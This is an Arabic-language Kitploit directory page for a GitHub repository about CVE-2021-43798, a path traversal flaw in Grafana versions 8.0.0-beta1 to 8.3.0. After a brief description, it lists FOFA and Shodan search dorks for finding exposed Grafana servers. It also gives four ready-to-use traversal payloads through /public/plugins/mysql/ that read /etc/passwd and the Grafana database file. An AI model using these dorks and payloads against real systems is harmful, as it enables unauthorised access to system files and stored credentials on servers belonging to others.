Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798 — CVE-2021-43798 هي ثغرة اجتياز مسار عالية الخطورة (درجة CVSS 3.1: 7.5) تؤثر على إصدارات Grafana من 8.0.0-beta1 حتى 8.3.0. تسمح للمهاجمين غير المصادق عليهم بقراءة ملفات تعسفية من الخادم عبر استغلال تعقيم غير صحيح في نقطة نهاية /public/plugins/:pluginId | Kitploit
أدوات/GitHubGitHub/0xf3d0rq/cve-2021-43798
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHub0xf3d0rq/cve-2021-43798

CVE-2021-43798

CVE-2021-43798 هي ثغرة اجتياز مسار عالية الخطورة (درجة CVSS 3.1: 7.5) تؤثر على إصدارات Grafana من 8.0.0-beta1 حتى 8.3.0. تسمح للمهاجمين غير المصادق عليهم بقراءة ملفات تعسفية من الخادم عبر استغلال تعقيم غير صحيح في نقطة نهاية /public/plugins/:pluginId

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-43798

CVE-2021-43798 هي ثغرة من نوع path traversal عالية الخطورة (درجة CVSS 3.1: 7.5) تؤثر على إصدارات Grafana من 8.0.0-beta1 حتى 8.3.0. تسمح للمهاجمين غير الموثقين بقراءة أي ملفات من الخادم عن طريق استغلال سوء التعقيم في نقطة النهاية /public/plugins/:pluginId

dork :

fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000

payload :

/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db

تنزيل الأداة